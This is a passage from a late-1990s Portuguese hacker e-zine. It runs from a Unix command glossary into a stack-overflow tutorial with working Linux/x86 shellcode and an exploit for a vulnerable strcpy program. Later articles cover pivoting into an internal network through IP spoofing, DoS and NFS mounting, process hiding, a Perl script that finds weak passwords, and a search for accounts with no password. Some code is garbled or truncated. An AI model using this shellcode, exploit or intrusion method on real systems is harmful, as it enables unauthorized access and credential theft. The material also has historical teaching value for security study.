terminal conectado. # stty ixon Comando indica que deve ser ativado o controle de fluxo XON;-ixon desabilitara procesamento de contro- le de fluxo XON. # stty ixoff Esse exemplo indica que o controle de fluxo XOFF deve ser desabilitado. Tem uma caralhada de opcoes... de um man stty! tr Comando usado para traduzir caracteres de um arqui- vo. Ele nao e' tao sofisticado quando o sed ou awk, mas e' bastante util. Um dos motivos mais comuns para se usar o comando tr e' executar traducao de caixa de arquivos texto, executar substituicoes simples de cadeias e executar edicao simples de padroes. # tr cuh1 cuh2 < arquivo Indica que todas ocorrencias de cuh1 no arquivo devem ser substituidas por cuh2 saindo no padrao. Ou...: # tr cuh1 cuh2 < arquivo > arquivo2 # tr \[a-z\] \[A-Z\] < arquivo > arquivo2 # tr '[a-z'] '[A-Z'] < arquivo > arquivo2 Como neston... invente uma! unpack O oposto logico de pack. (unix) Pra resumir os descompactadores sabe-se para linux os mais usados: unarj - ARJ unzip - nao sei ainda... ;) mas na compactacao nao pode se esquecer do tar e o gzip. No SCO se usa: # unpack arquivo.z vi Bah! VI e' assunto de uma noite, meu editor prefe- rido e mais legalzinho. Nao vou me apegar a detalhes pq senao vira aula. Contudo pode-se ver que e' uma poderosissima arma de trabalho desde que se saiba como utiliza-la. wc Acronimo de "word count" ( i think ;)). Ele e' otimo porque pode conta e informar a quantida- de de palavras, caracteres e linhas de um arquivo. Pode-se usar as tres opcoes: -l : so e' informada a quantidade de linhas. -w : so e' informada a quantidade de palavras. -c : so e' informada a quantidade de caracteres. Tem um exemplo pratico do wc numa das minhas backdoors mas coloco outro abaixo: # wc -l /etc/passwd # wc -cl ~/.profile # wc -w /etc/passwd who Comando who e' usado pra determinar a quantidade e identidade dos usuarios que estao utilizando o sis- tema no momento. Alem do nome dos usuarios, o comando who pode tb informar a hora de abertura da sessao e outras infos obtidas no /etc/utmp. Algumas das suas varias opcoes sao listadas abaixo: -a : essa opcao produz um relato de todas as opcoes especificadas. -H : coloca cabecalho nas colunas de saida do who. -s : informa apenas os campos ID do usuario, ID do terminal usado e hora ad abertura da sessao. -q : informa quantos usuarios estao com sessao aberta. -l : lista as linhas que estao disponiveis para aber- tura de sessao. Exemplos...? bug-off! Comunicacoes basicas em Rede uucp Esse comando fornece acesso mais facil ao subsiste- ma do uucp para a maior parte das transferencias de dados e fornece mais controle do que os outros uti- litarios de transferencia de dados do uucp. O forma- to geral do comando uucp e': # uucp arq.origem arq.destino O fonte deve estar no sistema local ou remoto, o mesmo valendo para o arq.destino arq.origem po- dem ser substituidos por qualquer nome do de arqui- vo unix valido, incluindo indentificadores de sis- tema remoto que precedam o nome do percursso como o caractere de exclamacao (!). Exemplo de transmis- sao uucp numa rede: # uucp -msaxur05 -ntsm -j -c ~/.profile hack|~pro- file senha007 cu Este comando estabelece uma sessao com um sistema remoto. Este comando chama "call up" ou "call unix" permite que o usuario que estiver com uma sessao aberta em uma maquina unix, abra sessao em uma se- gunda como se estivesse conectado localmente. Exemplo: # cu -s 1200 -n 12012980161 # cu -s 1200 -d -n 12012980161 # cu rambo Primeira linha conecta um modem no numero -n a velo- cidade impressionanente de 1200. Segunda faz o mesmo rastreando tudo q acontece. Terceira chama um sistema qualquer uulog Examina o sumario de registros de transacoes uucp e uux. Nao deixa de ser um comando de suporte. Ex:. # uulog -sleft # uulog -utsm # uulog uustat Comando obtem situacao de tarefas enfileiradas, ou elimina tarefas da fila. Permite que o usuario tenha informacoes sobre as tarefas do uucp. Tb serve pra cancelar qualquer tarefa que ainda esteja esperando processamento pelo uucp, ou qualquer tarefa que pos- sa estar em progresso. uuto Comando envia um arquivo local para o diretorio pu- blico de um sistema UNIX remoto. O comando uuto trabalha de forma bastante semelha- nte ao uucp exceto que somente um destino pode ser especificado como identificador do sistema de desti- no. uupick Comando aceita ou rejeita os arquivos transmitidos para o usuario. O comando uupick e' usado para recu- perar arquivos enviados para o usuario na maquina re- mota. Quando os arquivos chegam, o subsistema uucp da maquina de destino, via correio eletronico, nofi- fica o usuario da chegada dos arquivos. O destinata- rio pode entao usar o uupick pra copiar os arquivos de dados do diretorio em que o subsistema uucp os colocou, no diretorio corrente do destinatario. ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 6:> T h e S t a c k ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by csh ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù 0. INDEX 1. Introducao 2. Overview da stack em TASM/DOS 3. Overview da stack em Linux/ix86 3.1 example2.c 3.2 desassemblando example2.c 3.3 overview do codigo em assembler 3.4 overview do codigo a nivel de stack 3.5 funcoes com variaveis (pensando ao nivel de stack) 4. Executando codigo em stack 4.1 example3.c 4.2 desassemblando main code 4.3 example4.c 5. Shell code 5.1 shell code (example5.c) 5.2 desassemblando shell code (Linux/iNTEL) 5.3 desassemblando exit code (Linux/iNTEL) 5.4 escrevendo um shell code 5.4.1 nao sabemos nosso endereco! 5.4.2 nao podemos usar 0 em nosso codigo 5.5 csh's shell code (example6.c) 5.6 shell code 1st exploit (example7.c) 6. Tirando proveito disso tudo 6.1 criando um exploit 7 Conclusao 1. Introducao A cada dia que passa, novos exploits sao lancados, basicamente essa nova geracao de bugs sao baseados em stack overflow, lapsos do programador, que pensa como programar um utilitario sem pensar no problema de seguranca em stack. O que vai ser mostrado aqui, e' o funcionamento do stack, como programar um exploit, e dicas de programacao segura... Comecarei com um overview em Assembler iNTEL e no ambiente DOS, depos irei me transferir para o ambiente UNiX x86(Linux, BSD, SCO, etc..). 2. Overview da Stack em TASM/DOS Irei fazer um simples programa, quero para voces saberem como funciona o stack. --------------------->8-- example1.pas -->8----------------------------- procedure faca_algo; far; var temp: array[ 0..511] of byte; begin end; begin faca_algo; end. ***** Explanation on DOS ***** Estou sem turbo debugger.... hehehe no explaination... Fica pra outra hora 3. Overview em LiNUX/x86 O mesmo vale para FreeBSD, SCO, e todos os outros iNTEL based UNiX boxes. 3.1 --------------------->8-- example2.c -->8----------------------------- faca_algo() { char temp[512]; } main() { faca_algo(); } 3.2 Disassemblando example2: (desassemblado com o Free Software Fundation Inc. gdb, versao GDB 4.15.1) Antes de comecar, tenha em mente que normalmente as funcoes e os dados sao alinhados na memoria com tamanhos de ints, como podemos ver aqui em baixo, vai uma breve explicacao! 0x8048454 : pushl %ebp 0x8048455 : movl %esp,%ebp 0x8048457 : subl $0x200,%esp 0x804845d : movl %ebp,%esp 0x804845f : popl %ebp 0x8048460 : ret 0x8048464
: pushl %ebp 0x8048465 : movl %esp,%ebp 0x8048467 : call 0x8048454 0x804846c : movl %ebp,%esp 0x804846e : popl %ebp 0x804846f : ret End of assembler dump. 3.3 Overview do codigo em assembler >pushl %ebp >movl %esp,%ebp push %ebp, guarda o frame pointer no stack, para uso futuro... (na hora de sair da funcao...) a proxima instrucao faz com que o registrador ebp, tenha o mesmo valor do stack point, que e' feito para pegar variaveis de stack, por ser um registrador que pode ser facilmente indexado... >call 0x8048454 chama a funcao [faca_algo] >pushl %ebp >movl %esp,%ebp mesma tecnica de antes.. (Pra voces verem q o compilador repete esse tecnica por default...) >subl $0x200,%esp Aqui eles deslocam o ponteiro do stack no numero arrendondado de ints(tudo em bytes) das variaveis de stack.. no exemplo, sao deslocados 512 bytes(nosso temp tem 512 bytes).. Se no nosso temp tivesse 511, 510, 509, tbem iriamos alocar 512 bytes (no caso do linux, ints(ou "WORDS") sao 32 bits = 4 bytes.. >movl %ebp,%esp Agora sim estamos fazendo um update em ebp com esp (tecnica default...) >popl %ebp >ret tecnica de saida de uma funcao: retira-se do stack ebp[frame pointer] (vide a primeira instrucao da entrada na funcao) e cai fora para a continuacao do programa pre-funcao... 3.4 Overview do codigo em Stack... Digamos q nossa stack esteja vazia... vamos observa-la linha por linha de codigo... * = current stack point pushl %ebp * %ebp movl %esp,%ebp call 0x8048454 * return_address %ebp movl %ebp,%esp * %ebp popl %ebp * %ebp ret * usa a final stack que deve apontar para alguma funcao que termina o processo, ou algo parecido... [faca_algo] pushl %ebp * %ebp return_address %ebp movl %esp,%ebp subl $0x200,%esp * [temp] %ebp ret_addr %ebp movl %ebp,%esp * %ebp ret_addr %ebp como vcs podem ver, ele guarda o pre-%esp em %ebp, antes de alocar espaco na stack para o temp[512]; popl %ebp * ret_addr %ebp ret * %ebp (eu sempre vou usar %ebp ao inves de frame pointer pra nao dar no' na cabeca de voces, mas o real e' q isso e' o frame pointer, estudem assembler em modos de protecao, que voces vao descobrir o q vem a ser isso...) 3.5 Funcoes com variaveis (pensando ao nivel de stack) por exemplo... faca_algo( int a, int b, int c) char temp[ 512]; { /* ponto A */ } main() { faca_algo( 1, 2, 3); } a stack no "Ponto A" fica... * temp[ 0..511] %ebp ret_addr a b c %ebp ou seja, antes do call, o compiladorr empilha na stack os parametros passados ao programa 4. Executando codigo em stack Analizando o codigo acima, em vista do stack, vejamos como funciona.. STACK: * temp[0..511] %ebp ret_addr %ebp E' muito simples, se deslocarmos o return_address, facilmente iremos executar codigo nao do programa em si... :) Para isso, basta q troquemos temp[516]; bom.. vamos ver o exemplo abaixo.. vou modificar o exemplo acima, para executar codigos nao alheios... 4.1 --------------------->8-- example3.c -->8----------------------------- faca_algo() { char temp[512]; int *ret; } main() { int csh=0; faca_algo(); csh++; if (csh) printf("csh is a jerk...\n"); else printf("csh is a wizard...\n"); } executando o codigo, iremos ter a seguinte mensagem na tela: csh is a jerk... 4.2 Dissassemblando o codigo principal... 0x8048494
: pushl %ebp guarda frame pointer 0x8048495 : movl %esp,%ebp ebp = esp 0x8048497 : subl $0x4,%esp aloca espaco para variavel de stack "csh" 0x804849a : movl $0x0,0xfffffffc(%ebp) csh(variavel de stack) = 0; 0x80484a1 : call 0x8048484 chama funcao 0x80484a6 : incl 0xfffffffc(%ebp) csh++; 0x80484a9 : cmpl $0x0,0xfffffffc(%ebp) compara csh com 0... (vou parar de comentar por aki..... :) bom.. vou pular o codigo do "csh++;" a diferenca de enderecos sao 3 bytes... 0x80484ad : je 0x80484c0 0x80484af : pushl $0x8048508 0x80484b4 : call 0x8048388 0x80484b9 : addl $0x4,%esp 0x80484bc : jmp 0x80484cd 0x80484be : leal (%esi),%esi 0x80484c0 : pushl $0x804851a 0x80484c5 : call 0x8048388 0x80484ca : addl $0x4,%esp 0x80484cd : movl %ebp,%esp 0x80484cf : popl %ebp 0x80484d0 : ret modificando o codigo novamente... :) 4.3 --------------------->8-- example4.c -->8----------------------------- faca_algo() { char temp[512]; int *ret; ret = temp+516; *ret+=3; } main() { int csh=0; faca_algo(); csh++; if (csh) printf("csh is a jerk...\n"); else printf("csh is a wizard...\n"); } executando, teremos a seguinte saida... csh is a wizard... trick code huh? :) 5. Shell Code Basicamente o que queremos executar pela stack e' um codigo de shell... Essa sessao esta 100% escrita para LINUX/iNTEL!! Entao, se voce estiver procurando por outro shell code, inclui shell codes no final do artigo. 5.1 Shell code: --------------------->8-- example5.c -->8----------------------------- #include main() { char *arg[2]; arg[ 0] = "/bin/sh"; arg[ 1] = NULL; execve( arg[ 0], arg, NULL); } 5.2 Disassemblando Shell Code: (Linux) 0x8048134
: pushl %ebp 0x8048135 : movl %esp,%ebp 0x8048137 : subl $0x8,%esp guarda variavel arg na stack(blargh! ja' estou cansando de comentar.. hehe) 0x804813a : movl $0x8057d68,0xfffffff8(%ebp) argv[0]="/bin/sh" (akele endereco, 0x8057d68 e' o endereco da memoria onde esta a string /bin/sh (in text segment) 0x8048141 : movl $0x0,0xfffffffc(%ebp) argv[1] = NULL 0x8048148 : pushl $0x0 comeca a empilhar no stack os parametros... NULL 0x804814a : leal 0xfffffff8(%ebp),%eax 0x804814d : pushl %eax Endereco a variavel arg 0x804814e : movl 0xfffffff8(%ebp),%eax 0x8048151 : pushl %eax argv[0] 0x8048152 : call 0x8048368 <__execve> 0x8048157 : addl $0xc,%esp 0x804815a : movl %ebp,%esp 0x804815c : popl %ebp 0x804815d : ret 0x80482c0 : pushl %ebp 0x80482c1 <__execve+1>: movl %esp,%ebp 0x80482c3 <__execve+3>: pushl %ebx 0x80482c4 <__execve+4>: movl $0xb,%eax eax = 0xb 0x80482c9 <__execve+9>: movl 0x8(%ebp),%ebx ebx = endereco da string "/bin/sh" 0x80482cc <__execve+12>: movl 0xc(%ebp),%ecx ecx = endereco de arg 0x80482cf <__execve+15>: movl 0x10(%ebp),%edx edx = endereco do NULL 0x80482d2 <__execve+18>: int $0x80 kernel mode: eax = 11 ; chamanda do syscall para o execve ebx = endereco da string "/bin/sh" ecx = endereco do arg edx = endereco do NULL(environment variables) 0x80482d4 <__execve+20>: movl %eax,%edx 0x80482d6 <__execve+22>: testl %edx,%edx 0x80482d8 <__execve+24>: jnl 0x80482ea <__execve+42> 0x80482da <__execve+26>: negl %edx 0x80482dc <__execve+28>: pushl %edx 0x80482dd <__execve+29>: call 0x8049acc <__normal_errno_location> 0x80482e2 <__execve+34>: popl %edx 0x80482e3 <__execve+35>: movl %edx,(%eax) 0x80482e5 <__execve+37>: movl $0xffffffff,%eax 0x80482ea <__execve+42>: popl %ebx 0x80482eb <__execve+43>: movl %ebp,%esp 0x80482ed <__execve+45>: popl %ebp 0x80482ee <__execve+46>: ret 5.3 Disassemblando um Exit Code: 0x8048350 <_exit>: pushl %ebp 0x8048351 <_exit+1>: movl %esp,%ebp 0x8048353 <_exit+3>: pushl %ebx bah! :)) sem comentarios... heheheh 0x8048354 <_exit+4>: movl $0x1,%eax eax = 1 (syscall do kernel para o exit) 0x8048359 <_exit+9>: movl 0x8(%ebp),%ebx ebx = exit code 0x804835c <_exit+12>: int $0x80 la' la' la' la'!! Go figure it out! 0x804835e <_exit+14>: movl 0xfffffffc(%ebp),%ebx 0x8048361 <_exit+17>: movl %ebp,%esp 0x8048363 <_exit+19>: popl %ebp 0x8048364 <_exit+20>: ret 5.4 Escrevendo um shell code: Para escrever um shell code, segue os ingredientes: a) uma string "/bin/sh" seguido de NULL b) um codigo inteligente para execucao de um shell... bom, parece simples, mas temos varios problemas a seguir.. :) 5.4.1 nao sabemos o nosso endereco para usar no shell code! Solucao.. 0x???????? jmp + 0x????????+5 pop %esi : : . 0x????????+ call --5 "/bin/sh" isso e' uma redundancia de codigo, mas funciona, vc desloca a execucao para o fim do codigo q faz um call relativo para a proxima instrucao do inicio do codigo... ai vc deve estar se perguntando.. pq nao posso fazer assim? 0x???? call +5 0x????+5 pop %esi ? ate' e' possivel, mas voce deve incrementar o %esi para o fim do codigo, para assim pegar o endereco da string do shell code... usando o jmp + call no fim do arquivo, return_address vem com o endereco da proxima instrucao, q no caso, e' o proprio endereco da string "/bin/sh" 5.4.2 Nao podemos usar 0 no nosso codigo! Vamos usar tecnicas de programacao.. :) 5.5 csh's Shell code... Esse e' o meu shell code! Obvio q vc pode fazer o seu proprio... Nao quer dizer q o meu seja melhor ou o mais completo, mas e' o q eu fiz! :) (soh um apendice aki... nao fui eu quem descobriu nem muito menos aprendi sozinho, logicamente que li varios artigos de stack, somados a experiencias de asm, entao, se esse codigo parecer na mesma linha de outros shellcodes, nao me culpem, mas esta eh a forma mais optimizada de escrever um shellcode! ) --------------------->8-- example6.c -->8----------------------------- main(){ __asm__(" jmp 31 pop %esi /* Preparando Shell Code */ movl %esi, 0x8(%esi) xorl %eax, %eax movb %al, 0x7(%esi) movl %eax, 0xc(%esi) /* Shell CODE */ movb $0xb, %al movl %esi, %ebx leal 0x8(%esi), %ecx leal 0xc(%esi), %edx int $0x80 /* Exit CODE */ xorl %eax, %eax movl %eax, %ebx incl %eax int $0x80 /* Return CODE (tecnica para descobrir endereco ;) */ call -36 .string \"/bin/sh\" "); } 5.6 Shell Code first exploit esse exploit vair rodar uma shell, explorando o stack incluindo em seu return address, o endereco do shell code... --------------------->8-- example7.c -->8----------------------------- char shell[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\x89\xc3\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; main() { int *ret; ret = (int *)&ret+2; *ret=(int)shell; } 6. Tirando proveito disso tudo 6.1 Criando um exploit: para isso, voce tem q analizar o codigo fonte do programa a ser exploitado... saber le-lo ao nivel de stack e ao nivel de codigo simultaneamente, saber captar q nakele momento, o seu programa e' vulneravel, e que podera' ser usado um exploit contra ele... 6.1.1 --------------------->8-- example8.c -->8----------------------------- #include main( argc, argv) int argc; char **argv; { char nome[ 128]; if (argc<2) { printf("Sem nome...\n"); exit( 0); } strcpy( nome, argv[1]); printf("Ola, %s\n", nome); } 6.1.2 exploit para example8.c com esse exemplo, vemos q a variavel do nome tem 128 caracteres... se vc entrar em argv[1] uma string com mais de 128 bytes, vai entrar em core dumped... faca a tentativa... pq core dumped? pq vc vai sobrepor o return address, e ele vai voltar para uma area de memoria a qual nao pertence ao processo, isso vai gerar uma excessao no processador, a qual o kernel gera um segmentation violation, copiando a area de memoria usada no programa, jogando no core(nao cabe entrar em detalhes desse arquivo, entao, fica essa ideia basica) --------------------->8-- example9.c -->8----------------------------- #include char shell[]= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\x89\xc3\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; get_esp(){ __asm("mov %esp, %eax"); } main() { char buff[ 256]; int i, desl; unsigned long addr; desl = -0x30; addr = get_esp() - desl; for (i=0;i<128+8;i+=4) *(unsigned long *)(buff + i) = addr; for (;i<200;i++) buff[ i] = 0x90; for (i=0;i Project: Multiples IPs ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by csh ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù PS: essa e' a introducao ao projeto, existe muita coisa a ser melhorada, e aki esta o inicio de uma nova fase da axur05. Os projetos: designados pelos editores ou ideias de outros, sao trabalhos 100% by nos, que estao abertos como projetos para q todos possam participar, entre eles sysadms, coders, hackers e afins. Essa ideia eu tive quando precisava assumir um IP para ter acesso a uma rede interna. Ela comecou basica, mas a medida que parei pra pensa, ela eh maior do que eu pude pensar! Uma pequena observacao quanto aos nossos profissionais de rede neste nosso pais tao atrasado tecnologicamente, onde nao basta ter capacidade, tem q ter papeis para se ter uma chance, e quando se tem, nao sao valorizadas as ideias dos nossos pesquisadores, blah.. deixa pra lah... Sub-redes, redes atras de proxies, LANs em geral, sao totalmente inseguras... Pessoas fazem multiplas redes, net-casting, etc... mas nem ao menos usam um dispositivo que separe os barramentos. "ah, deixa assim, quando o nivel de colisoes aumentar, agente dah um jeito" agora vcs sabem pq normalmente a embratel tem problemas de roteamento. Um switch, filtro, seja o que for, jah eh o inicio. Mas... tudo trafega no mesmo barramento, um comedor de bytes, vulgo analizador de pacotes, poderia dar um historico de q tipo de dados trafegam entre ou pelas redes, dando de cara, 99% de chances de invasao. Praticamente falando(objetivo principal da axur05), a ideia basica eh passar PPP por TCP, sendo q o PPP equivale a outro IP, e voce tera' na verdade dois IPs(tunneling). Configurando as rotas corretamente, vc tera acesso a rede do IP que vc esta trafegando. Vou tentar ilustrar... (logicamente q esses numeros sao meros exemplos) 124.70.82.0/24 & 10.0.0.0/8 -------------+---------------------------------- Barramento Ethernet | 124.70.82.10 Eth0 255.255.255.0 mask Digamos que voce consiga acesso a makina 124.70.82.10, mas voce quer entrar na rede 10.0.0.0, pq quer a makina onde ficam informacoes secretas, digamos a makina 10.0.0.1. vc de dentro dessa makina, consegue informacoes do tipo: - trusted relationship (export, nis, smb, etc..etc..); - makinas que estejam ligadas a rede 10.0.0.0; Probing...(is it a crime?) Export list for 10.0.0.1: / 10.0.0.4 Bom, podemos analizar o host 10.0.0.4 a ponto de usar um D.O.S. attack pra por a makina pra dormir mais cedo. E a seguir, encapsulamos PPP via TCP pela makina 124.70.82.10 com o IP de 10.0.0.4. csh:~# ppp 8500 - 10.0.0.4:10.0.0.200 ppp<->tcp tunneling v1.1 from bdkit v0.2beta (c)1997, csh@sekurity.org PS: eh preciso de um ip da mesma rede do outro lado do ppp, para q o ker- nel veja q akela rede passa por ali e entao pegar o pacote e levar pro devido lugar. no outro lado: 124.70.82.10:~# ppp 8500 csh.axur05.org -proxyarp ppp<->tcp tunneling v1.1 from bdkit v0.2beta (c)1997, csh@sekurity.org tty allocated is /dev/ttyp0 o -proxyarp eh necessario para q o kernel avise ao router pra mandar para o ARP correto, devido ao IP assinalado por ele. ao dar um ifconfig, ppp0 Link encap:Point-to-Point Protocol inet addr:10.0.0.4 P-t-P:10.0.0.200 Mask:255.255.255.0 UP POINTOPOINT RUNNING MTU:1500 Metric:1 RX packets:2006 errors:1 dropped:1 overruns:0 frame:0 TX packets:2201 errors:0 dropped:0 overruns:0 carrier:0 coll:0 voilah.. somos o nosso IP mais esse! vamos ver como estao nossas rotas... csh:~# route Kernel routing table Destination Gateway Genmask Flags MSS Window Use Iface csh * 255.255.255.0 U 1436 0 1209545 eth0 10.0.0.200 * 255.255.255.255 UH 0 0 1 ppp0 loopback * 255.0.0.0 U 1936 0 116156 lo default main.axur05.org * UG 1436 0 859859 eth0 bom, nao temos uma rota para a rede 10.0.0.0 ... se dermos um ping 10.0.0.0 ele vai mandar o pacote pela rota default.(eth0) vamos entao adicionar uma rota: csh:~# route add -net 10.0.0.0 netmask 255.0.0.0 ppp0 csh:~# route Kernel routing table Destination Gateway Genmask Flags MSS Window Use Iface csh * 255.255.255.0 U 1436 0 1209545 eth0 10.0.0.200 * 255.255.255.255 UH 0 0 1 ppp0 10.0.0.0 * 255.0.0.0 U 0 0 0 ppp0 loopback * 255.0.0.0 U 1936 0 116156 lo default main.axur05.org * UG 1436 0 859859 eth0 agora temos uma rota pra 10.0.0.1 vamos dar um ping pra testar e pah.. PING 10.0.0.1 (10.0.0.1): 56 data bytes 64 bytes from 10.0.0.1: icmp_seq=0 ttl=241 time=668.8 ms 64 bytes from 10.0.0.1: icmp_seq=1 ttl=241 time=660.4 ms 64 bytes from 10.0.0.1: icmp_seq=2 ttl=241 time=640.4 ms 64 bytes from 10.0.0.1: icmp_seq=3 ttl=241 time=660.4 ms 64 bytes from 10.0.0.1: icmp_seq=4 ttl=241 time=640.4 ms --- 10.0.0.1 ping statistics --- 6 packets transmitted, 5 packets received, 16% packet loss round-trip min/avg/max = 640.4/654.0/668.8 ms agora.. o teste final... mount 10.0.0.1:/ /nfs ls -la /nfs/etc/passwd -rw-r--r-- 1 root root 123123132 Dec 1 04:14 /nfs/etc/passwd parabens... :) Logicamente essa nao eh a unica finalidade para tal ideia... imagine o q vc pode fazer... :) - utilizar redes dais quais vc nao pode via a sua rede; - probing via ip falso para nao tracear voce; - usar um ip fixo; - use a sua imaginacao... PS: o remote backdoor development kit eh outro projeto em desenvolvimento.. APPENDICE: Como usar o ppp ppp<->tcp tunneling v1.1 from bdkit v0.2beta (c)1997, csh@sekurity.org ppp: [pppd comands] if you supress IP or use a dash, it will act as server (veja acima como eu fiz e pah) export STEALTH="achoooooooooo" usando essa variavel de ambiente, ao dar ps vc vai ver seu processo rodando com o nome dessa variavel... (vc pode botar algo como ftp) Ate' a proxima gente... :) ÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä Ä ÄÄ ù ³ 8:> Tricks! ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ :ù by AciDmuD ÅÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä Ä ÄÄ Ä ù Vou tentar relacionar com os itens abaixo o que eu acho mais importante no que se relaciona ao cracking e manutencao de senhas. 100% by axur05 1 - Checagem rapida em busca de usuarios com senhas imbecis em um sis- ------------------------------------------------------------------ qualquer ------------- Na busca de uma maneira pela qual eu pudesse obter uma busca rapida por senhas que se utilizassem de palavras faceis ou instintivamente deduziveis desenvolvi um programa em perl que faz o check-in do ar- quivo de senhas em busca de usuarios com senhas iguais ao login, de usuarios sem senha, usuarios com a senha = ao login em letras mai- usculas, usuarios com senha = login com a primeira letra maiuscula e de usuarios com senha = login ao contrario. ---- buh.pl ----- r#!/usr/bin/perl # cata senha imbecis pra perl5 - by AciDmuD while (($login,$senha) = getpwent) { print "\nProcurando........\n"; print "$login nao tem senha\n" if !$senha; print "$login usa a senha $login\n" if (crypt($login,$senha) eq $senha); print "$login usa a senha = login com letras maisculas\n" if (crypt(uc($login), $senha) eq $senha); print "$login usa a senha = login com primeira letra maiscula\n" if (crypt(ucfirst($login), $senha) eq $senha); print "$login usa a senha = login ao contrario\n" if (crypt( reverse $login, $senha) eq $senha); } ---- buh.pl ----- Simples porem muito util no caso de vc precisar de um meio de crackear um arquivo de senhas pra um acesso rapido de dentro do proprio provedor sem utilizar nenhum compilador, somente com interpretacao dos comandos. Voce pode incrementa-lo a vontade com senha q tenham $login depois nume- ro 1 ou coisa e tal. Eu mesmo ja o utilizei varias vezes.... 2 - Procurar por contas sem senha pelo shell ---------------------------------------- Com a versatilidade do awk vc pode fazer: # cat /etc/passwd | awk -F: 'lenght($2)<1 {print$1}' lucifer # ( depois... ) # egrep 'lucifer' /etc/passwd lucifer::123:10:fadinha magica:/home/hell:/bin/csh Use e abuse! 3 - Usando acesso de usuario que nao gosta de internet =) ----------------------------------------------------- Sabe aqueles carinhas que tem acesso a internet mas nao aparecem nunca, pois e'! Aqui vai como descobrir eles com um pequenino sh ---- user-mes.sh ----- #!/bin/sh # lista de usuarios q nao acessam a UM MES ( que isso ) - by AciDmuD # PATH=/bin:/usr/bin;export PATH umask 077 # nao totalmente necessario MES=`data | awk '{print $2}'` /bin/last | /bin/grep $MES | awk '{print $1}' | /bin/sort -u > /tmp/users1$$ cat /etc/passwd | /bin/awk -F: '{print $1}' | /bin/sort -u > /tmp/users2$$ /bin/comm -13 /tmp/users[12]$$ /bin/rm -f /tmp/users[12]$$ ---- user-mes.sh ----- Essa e' boa pra vc nao estourar as horas de alguem q usa muito e para que vc possa administrar melhor seus acessos sem se perde-lo. ;) 4 - Guest com (::) -------------- Essa e' boa pra ver quantos espertinhos vao tentar entrar na tua maquina. Em primeiro lugar crie a linha no /etc/passwd: guest::9999:1:Hackerzao:/usr/guest:/usr/adm/guestlogin agora... o guestlogin abaixo! - guestlogin #!/bin/sh echo " Guest login" >> /var/adm/warn.guest sleep 20 # vai parecer q a rede ta lenta echo "/tmp/full" sleep 5 echo "Acesso a Rede de Dados do Ministerio do Exercito Brasileiro" echo "Espere um momento..." sleep 120 # sacanagem exit # hehehe - guestlogin 5 - Dando um susto no invasor ------------------------- Essa na minha opniao e' a mais divertida, o cara da um telnet em voce e vai ter uma surpresa. O script o faz se logar aut-o-matic depois dando um telnet na maquina dele mesmo, se logando como root e dando um rm -rf / Sem esquecer que no final o probe invasor mal sucedido recebe uma porrada de tiro. Recebi o fonte de um amigo, modifiquei mas esta o agradecimento ao original do nosso amigo Jyhad... realmente gostei muito dele! Primeiro vai no /etc/hosts.deny e edite ele com a seguinte linha: in.telnetsnoopd: ALL: twist /bin/deny %h %d axur05 axur05.org Pode ser com o in.telnetd tb! Ai vc coloca o programa abaixo no /bin Ai esta uma maneira divertida de se defender, ao mesmo que nao inofensiva. thanx to WyrM "the jackal" - deny #!/bin/sh /bin/echo "" /bin/echo "Linux 2.0.32 ($4) (ttyp0)" /bin/echo "" /bin/echo -n "$3 login: " /usr/bin/sleep 1 /bin/echo -n "a" /usr/bin/sleep 1 /bin/echo -n "x" /usr/bin/sleep 1 /bin/echo -n "u" /usr/bin/sleep 1 /bin/echo -n "r" /usr/bin/sleep 1 /bin/echo "05" /bin/echo -n "Password: " /usr/bin/sleep 3 /bin/echo "" /bin/echo "" /bin/echo "Welcome to $3!" /bin/echo "" /bin/echo "Last login: Sat Dec 20 10:45:28 on ttyp0." /bin/echo "No mail." /bin/echo -n "$3:~# " /usr/bin/sleep 1 /bin/echo -n "tel" /usr/bin/sleep 1 /bin/echo -n "n" /usr/bin/sleep 1 /bin/echo -n "e" /usr/bin/sleep 1 /bin/echo -n "t" /usr/bin/sleep 1 /bin/echo " $1" /usr/bin/sleep 1 /bin/echo "Trying $1..." /usr/bin/sleep 1 /bin/echo "Connected to $1" /bin/echo "Escape character is '^]'." /usr/bin/sleep 1 /bin/echo "" /bin/echo "Linux 2.0.32 ($1) (ttyp0)" /bin/echo "" /bin/echo -n "$1 login: " /usr/bin/sleep 1 /bin/echo -n "r" /usr/bin/sleep 1 /bin/echo -n "o" /usr/bin/sleep 1 /bin/echo -n "o" /usr/bin/sleep 1 /bin/echo "t" /bin/echo -n "Password: " /usr/bin/sleep 3 /bin/echo "" /bin/echo "" /bin/echo "Welcome to $1!" /bin/echo "" /bin/echo "Last login: Sat Dec 20 10:45:28 on ttyp0." /bin/echo "No mail." /bin/echo -n "$1:~#" /usr/bin/sleep 1 /bin/echo " tentar invadir a maquina dos outros e' feio :~(" /usr/bin/sleep 1 /bin/echo -n "$1:~#" /usr/bin/sleep 5 